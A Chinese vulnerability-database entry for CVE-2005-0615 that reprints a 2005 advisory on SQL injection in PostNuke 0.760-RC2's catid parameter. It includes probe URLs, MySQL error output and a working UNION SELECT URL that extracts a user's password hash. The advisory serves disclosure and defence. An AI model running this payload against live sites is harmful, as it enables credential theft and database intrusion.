PostNuke漏洞
漏洞ID | 1199323 | 漏洞类型 | SQL注入 |
发布时间 | 2005-05-02 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2005-0615 |
CNNVD-ID | CNNVD-200505-778 |
漏洞平台 | N/A | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
PostNuke0.760-RC2中的(1)index.php,(2)modules.php或(3)admin.php中存在多个SQL注入漏洞,远程攻击者可以通过一个catid参数来执行任意SQL代码。
|漏洞EXP
[PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1]
Author: Maksymilian Arciemowicz
Date: 15.2.2005
- --- 0.Description ---
PostNuke: The Phoenix Release (0.760-RC2=>x)
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
- --- 1. Critical SQL INJECTION ---
This SQL INJECTION is in modules/News/funcs.php in function getArticles(). When this function
is active(Other Stories), we can add sql querty in varible catid.
For exemple:
http://[HOST]/[DIR]/index.php?catid='cXIb8O3
Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY
pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------
http://[HOST]/[DIR]/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3
Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY
pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------
http://[HOST]/[DIR]/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3
Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY
pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------
etc.
and varible $query is:
- ---------------
SELECT pn__stories.pn_aid AS "aid", pn__stories.pn_bodytext AS "bodytext",
pn__stories_cat.pn_themeoverride AS "catthemeoverride", pn__stories.pn_catid AS "cid",
pn__stories_cat.pn_title AS "cattitle", pn__stories.pn_comments AS "comments",
pn__stories.pn_counter AS "counter", pn__stories.pn_hometext AS "hometext",
pn__stories.pn_informant AS "informant", pn__stories.pn_notes AS "notes", pn__stories.pn_sid AS
"sid", pn__stories.pn_themeoverride AS "themeoverride", pn__topics.pn_topicid AS "tid",
pn__stories.pn_time AS "time", pn__stories.pn_title AS "title", pn__topics.pn_topicname AS
"topicname", pn__topics.pn_topicimage AS "topicimage", pn__topics.pn_topictext AS
"topictext",
pn__topics.pn_counter AS "tcounter", pn__stories.pn_time AS "unixtime", pn__stories.pn_withcomm
AS "withcomm" FROM pn__stories LEFT JOIN pn__stories_cat ON pn__stories.pn_catid =
pn__stories_cat.pn_catid LEFT JOIN pn__topics ON pn__stories.pn_topic = pn__topics.pn_topicid
WHERE (pn__stories.pn_language
='eng' OR pn__stories.pn_language='') AND pn__stories.pn_catid='cXIb8O3 ORDER BY
pn__stories.pn_time DESC
- ---------------
Exploit:
This exploit get password from user with id=2. But frist check prefix.
Step 1.
http://[HOST]/[DIR]/index.php?catid='cXIb8O3
Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY
pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------
and pn_ is that prefix.
Step 2.
http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread
&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null
,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE
%20pn_uid=2/*
- --- 2. How to fix ---
Download the new version of the script or update.
- --- 3.Contact ---
Author: Maksymilian Arciemowicz
|受影响的产品
Postnuke Software Foundation Postnuke 0.760 Rc2
|参考资料
来源:SECTRACK
名称:1013324
链接:http://securitytracker.com/id?1013324
来源:news.postnuke.com
链接:http://news.postnuke.com/Article2669.html
来源:BUGTRAQ
名称:20050228[SECURITYREASON.COM]PostNukeCriticalSQLInjection0.760-RC2=>x
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110962819232255&w;=2
相关推荐: SGI IRIX login/scheme缓冲区溢出漏洞
SGI IRIX login/scheme缓冲区溢出漏洞 漏洞ID 1207505 漏洞类型 缓冲区溢出 发布时间 1997-07-16 更新时间 2005-05-02 CVE编号 CVE-1999-0028 CNNVD-ID CNNVD-199707-027…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666